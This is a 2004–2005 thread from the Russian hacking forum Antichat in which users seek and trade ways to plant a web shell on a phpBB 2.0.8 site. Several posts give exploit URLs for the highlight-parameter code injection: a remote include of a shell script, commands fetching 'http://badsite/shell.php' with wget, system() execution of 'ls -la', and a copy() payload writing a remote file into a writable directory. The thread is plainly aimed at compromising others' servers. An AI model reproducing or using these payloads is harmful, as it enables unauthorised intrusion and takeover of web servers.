ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group
  #1  
Старый 22.12.2004, 00:56
Аватар для onyx3
onyx3
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме:
0

Репутация: 0
По умолчанию Вопрос про заливку шелла в Powered by phpBB 2.0.8 © 2001 phpBB Group

Люди, подскажите плизз.... буду очень признателен:

вот когда я хочу скатать шелл на сервер, используя:


http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527


мне в ответ пишет:

he html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group
 
Ответить с цитированием

  #2  
Старый 24.12.2004, 16:48
Аватар для TaskFall
TaskFall
Новичок
Регистрация: 24.12.2004
Сообщений: 2
Провел на форуме:
3851

Репутация: 0
По умолчанию

можно закачать shell этой командой:
viewtopic.php?p=1&highlight=%2527.$poster=%60$ls%6 0.%2527&ls=wget%20http://badsite/shell.php

или:
viewtopic.php?p=3906&highlight=%2527.$poster=`wget %09http://badsite/shell.php`.%2527

может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)
 
Ответить с цитированием

  #3  
Старый 25.12.2004, 00:42
Аватар для illusion
illusion
Новичок
Регистрация: 07.12.2004
Сообщений: 27
Провел на форуме:
0

Репутация: 0
Отправить сообщение для illusion с помощью ICQ
По умолчанию

Цитата:
Сообщение от onyx3  
http://имя хоста/modules.php?name=Forums/viewtopic.php?t=44=http://123.123.123.123/remview.php%00&t=1&highlight=%2527.include($_GET[44]).%2527
Onyx3, а почему ...t=44=... это бред! в твоём случае надо писать без t= !
 
Ответить с цитированием

  #4  
Старый 25.12.2004, 06:20
Аватар для DarkDante
DarkDante
Новичок
Регистрация: 24.12.2004
Сообщений: 16
Провел на форуме:
110162

Репутация: 7
Angry

а у меня вообще пишет что такой темы нет
 
Ответить с цитированием

  #5  
Старый 26.12.2004, 00:08
Аватар для onyx3
onyx3
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме:
0

Репутация: 0
По умолчанию

Люди, ведь форум находится в : http://имяхоста/modules.php?name=Forums

И не одна из этих комманд чтобы залить шелл не действует!!!
Пишет либо - модуль не активен, либо ошибку Денвера!!!


Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group
 
Ответить с цитированием

  #6  
Старый 26.12.2004, 21:20
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

поробуй выполнить команды так:
Цитата:
viewtopic.php?t=1&highlight=%2527.system($_GET[id]).%2527&id=ls -la
 
Ответить с цитированием

  #7  
Старый 27.12.2004, 00:24
Аватар для vega2k
vega2k
Новичок
Регистрация: 27.12.2004
Сообщений: 7
Провел на форуме:
11532

Репутация: 0
По умолчанию

а возможно ли записать открытую на запись, которая находиться на сервере не в папке "форум"

и еще,
Цитата:
может такая заморочка быть, типа привилегий нет чтобы файл создавать, ну тогда ищи папки доступные для записи =)
ну узнал, я какая папка доступна на запись (даже в папке форум), что в запрос надо написать ?

viewtopic.php?a=http://123.123.123.123/remview.php&b=../../db/rem.php&t=4&highlight=%2527%252ecopy($_GET[a],$_GET[b])%252e%2527 ???????

типо этого? b=../../db/
а что вместо точек писать? полный путь? где находиться папка?
в таком случае как именно?
что брать за корневой католог?
forum/db/
или полный путь
/usr/home/public_html/forum


не понятно всё это...

P.S.
ведь drwxrwxrwx - это открытая папка на запись.

Последний раз редактировалось vega2k; 27.12.2004 в 00:38..
 
Ответить с цитированием

  #8  
Старый 27.12.2004, 00:46
Аватар для virgoz
virgoz
Участник форума
Регистрация: 16.09.2004
Сообщений: 193
Провел на форуме:
621131

Репутация: 47
Отправить сообщение для virgoz с помощью ICQ
По умолчанию

да не геморься ты, лучше залей обычным wget'ом и потом скопируй...
 
Ответить с цитированием

  #9  
Старый 27.12.2004, 23:59
Аватар для onyx3
onyx3
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме:
0

Репутация: 0
По умолчанию

Цитата:
Сообщение от virgoz  
поробуй выполнить команды так:
мне в ответ пишет:

The html tags you attempted to use are not allowed

[ Go Back ]

Как можно обойти эту защиту??? форум Powered by phpBB 2.0.8 © 2001 phpBB Group
 
Ответить с цитированием

  #10  
Старый 05.01.2005, 17:06
Аватар для onyx3
onyx3
Новичок
Регистрация: 22.12.2004
Сообщений: 18
Провел на форуме:
0

Репутация: 0
По умолчанию

Эй ну что кто нибудь встречал такую проблему??
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Какие есть уязвимости в Powered by phpBB: 2.0.0 © 2001 phpBB Group? forever777 Форумы 4 14.12.2005 13:19
ЕсТь ВоПрос Guma Чаты 4 26.10.2005 21:48
Вопрос о залиаке шелла через phpBB 2.0.6. Guest Форумы 6 23.12.2004 22:12



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ